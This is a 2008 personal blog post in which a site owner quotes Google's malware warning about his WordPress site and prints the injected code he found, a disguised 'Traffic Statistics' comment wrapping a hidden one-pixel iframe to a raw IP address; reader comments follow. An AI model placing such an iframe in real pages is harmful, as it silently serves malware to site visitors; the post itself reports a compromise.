RSS
 

Malware notification from Google

10 Feb

I just received this from Google (No, it’s not fake).

Dear site owner or webmaster of tomsommer.dk,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

http://tomsommer .dk/
http://www.tomsommer .dk/
http://tomsommer .dk/2007/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//tomsommer.dk/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it’s important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you’ve secured your site, you can request that the warning be
removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users,
we will remove the warning.

Sincerely,
Google Search Quality Team

They offer NO explanation or hint as to why it was marked as containing malware.

I checked my source, and right enough, it appears my WordPress installation (which I keep very much up to date, I might add) has been compromised.

One post suddenly contained:

<!-- Traffic Statistics --><br />

<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe><br />

<!-- End Traffic Statistics -->

Pretty cool service, I suspect an exploit fixed in WordPress 2.3.3 was used — remember to update your shit people!

 
3 Comments

Posted in Ramblings

 

Tags: ,

Leave a Reply

 
 
 
 

  1. An Old WordPress Version Can Get You Banned In Google

    February 22, 2008 at 15:46

    [...] Tom Sommer’s Weblog [...]

     

  2. ersaky

    March 7, 2008 at 01:28

    Thanks for your information about malware notification from google, i had a problem like that on my joomla based web.

     

  3. Asif Patrl

    July 5, 2008 at 12:40

    hi there,
    I have just received teh same email from Google. This is causing me great concern and i have absolutely no idea why Google have done this. I have looked through the code and there is no indication as to why this has happended.

    Can anybody help?
    thanks in advance.